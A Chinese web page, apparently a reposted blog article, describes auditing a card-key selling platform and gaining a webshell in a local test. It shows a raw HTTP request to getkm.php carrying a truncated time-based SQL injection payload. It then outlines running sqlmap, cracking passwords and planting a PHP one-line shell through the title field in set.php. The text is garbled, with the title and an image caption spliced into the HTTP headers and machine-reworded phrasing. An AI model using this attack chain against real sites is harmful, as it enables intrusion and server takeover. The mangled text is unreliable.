首页 » Web前端 » getkmphp技巧_卡密平台审计到getshell本地测试

getkmphp技巧_卡密平台审计到getshell本地测试

访客 2024-11-27 0

扫一扫用手机浏览

文章目录 [+]

POST /getkm.php HTTP/1.1

Host: 127.0.0.1

getkmphp技巧_卡密平台审计到getshell本地测试

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

getkmphp技巧_卡密平台审计到getshell本地测试
(图片来自网络侵删)

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 57

Cookie: PHPSESSID=cidvriorg2as3nbgc575f6mhdr

Connection: close

Upgrade-Insecure-Requests: 1

tqm=11' AND (SELECT FROM (SELECT(SLEEP(5)

布局一波,看看相应码

丢sqlmap里面

接下来便是常规跑密码,我就不说了。

getshell

我们去跟进一下set.php文件

包含emailconfig.php,连续跟进

创造title处可以布局一下phpinfo

成功实行

这里就可以直接写shell了,布局个一句话

也希望用这套源码的朋友,多多把稳下!

制作不易,点个赞再走吧!

#网络安全在我身边#

相关文章

好学松鼠IT,探索信息技术领域的无限可能

在这个信息爆炸的时代,信息技术(IT)已经成为推动社会进步的重要力量。好学松鼠IT,作为一家专注于IT领域的教育机构,致力于为广大...

Web前端 2024-12-26 阅读0 评论0

大学日语IT,融合与创新的时代潮流

随着科技的飞速发展,信息技术(IT)已经成为现代社会的核心驱动力。在日语教育领域,IT的应用也日益广泛,大学日语IT课程应运而生。...

Web前端 2024-12-26 阅读0 评论0

C语言在游戏开发中的魅力与探索

在当今这个数字时代,游戏产业已成为全球最具活力和潜力的产业之一。作为一门历史悠久、应用广泛的编程语言,C语言在游戏开发领域发挥着至...

Web前端 2024-12-26 阅读0 评论0